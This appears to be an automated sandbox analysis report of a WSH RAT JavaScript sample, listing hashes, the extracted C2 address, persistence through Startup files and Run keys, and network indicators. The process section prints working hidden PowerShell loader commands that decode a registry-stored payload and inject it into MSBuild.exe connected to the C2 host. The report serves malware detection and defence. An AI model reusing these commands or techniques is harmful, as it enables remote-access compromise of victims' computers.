Analysis
-
max time kernel
148s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15-05-2024 02:49
Static task
static1
Behavioral task
behavioral1
Sample
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Resource
win10v2004-20240426-en
General
-
Target
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
-
Size
616KB
-
MD5
70a617fd2bdb08c64a65ecfba1612140
-
SHA1
d41eec4cb2f449b845d3f4fa3baf80086705bba6
-
SHA256
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc
-
SHA512
52c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961
-
SSDEEP
12288:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZH19Iimg0VtxWvTbxzOObcizI/mofdEMa:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZ
Malware Config
Extracted
wshrat
http://masterokrwh.duckdns.org:8426
Signatures
-
Blocklisted process makes network request 33 IoCs
flow pid Process 4 2952 wscript.exe 6 2952 wscript.exe 9 2952 wscript.exe 10 2952 wscript.exe 12 2952 wscript.exe 14 2952 wscript.exe 15 2952 wscript.exe 16 2952 wscript.exe 17 2952 wscript.exe 18 2952 wscript.exe 21 2952 wscript.exe 22 2952 wscript.exe 23 2952 wscript.exe 24 2952 wscript.exe 25 2952 wscript.exe 27 2952 wscript.exe 28 2952 wscript.exe 29 2952 wscript.exe 31 2952 wscript.exe 32 2952 wscript.exe 33 2952 wscript.exe 35 2952 wscript.exe 36 2952 wscript.exe 37 2952 wscript.exe 39 2952 wscript.exe 40 2952 wscript.exe 41 2952 wscript.exe 43 2952 wscript.exe 44 2952 wscript.exe 45 2952 wscript.exe 47 2952 wscript.exe 48 2952 wscript.exe 49 2952 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2908 powershell.exe 2896 powershell.exe 2520 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js\"" wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 pastebin.com 10 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2520 set thread context of 2764 2520 powershell.exe 36 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 30 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 15 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 29 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 31 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 49 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 16 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 35 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 36 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 18 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 24 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 28 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 45 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 48 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 17 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 32 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 23 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 25 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 37 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 39 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 43 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 33 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 27 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 44 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 14 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 22 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 40 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 41 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 47 WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2908 powershell.exe 2896 powershell.exe 2520 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2520 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2764 MSBuild.exe 2764 MSBuild.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 2952 wrote to memory of 2908 2952 wscript.exe 30 PID 2952 wrote to memory of 2908 2952 wscript.exe 30 PID 2952 wrote to memory of 2908 2952 wscript.exe 30 PID 2952 wrote to memory of 2896 2952 wscript.exe 32 PID 2952 wrote to memory of 2896 2952 wscript.exe 32 PID 2952 wrote to memory of 2896 2952 wscript.exe 32 PID 2952 wrote to memory of 2520 2952 wscript.exe 34 PID 2952 wrote to memory of 2520 2952 wscript.exe 34 PID 2952 wrote to memory of 2520 2952 wscript.exe 34 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36 PID 2520 wrote to memory of 2764 2520 powershell.exe 36
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'masterokrwh.duckdns.org 8426 \"WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom\" 1'));"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exepath masterokrwh.duckdns.org 8426 "WSHRAT|08193A6E|QGTQZTRE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 15/5/2024|JavaScript-v3.4|GB:United Kingdom" 13⤵
- Suspicious use of SetWindowsHookEx
PID:2764
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD500c022e9d13bcb7f4f51a78ff8a600ca
SHA1d859153c5430341ba7ce706e8b9fc9732c904a24
SHA256d5137c69b8951c47d4fbb03dffced16d2f68aef100fc5265799ae952c9d297a0
SHA5126a18d9502d7f60e47f962a7e42b87ba3aa2e695e570f532f9b42e5e98cce747dfb7afe15df955075c5ce6ca969bb4c580538722778be7ddad1415501127553cf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Filesize616KB
MD570a617fd2bdb08c64a65ecfba1612140
SHA1d41eec4cb2f449b845d3f4fa3baf80086705bba6
SHA256cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc
SHA51252c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961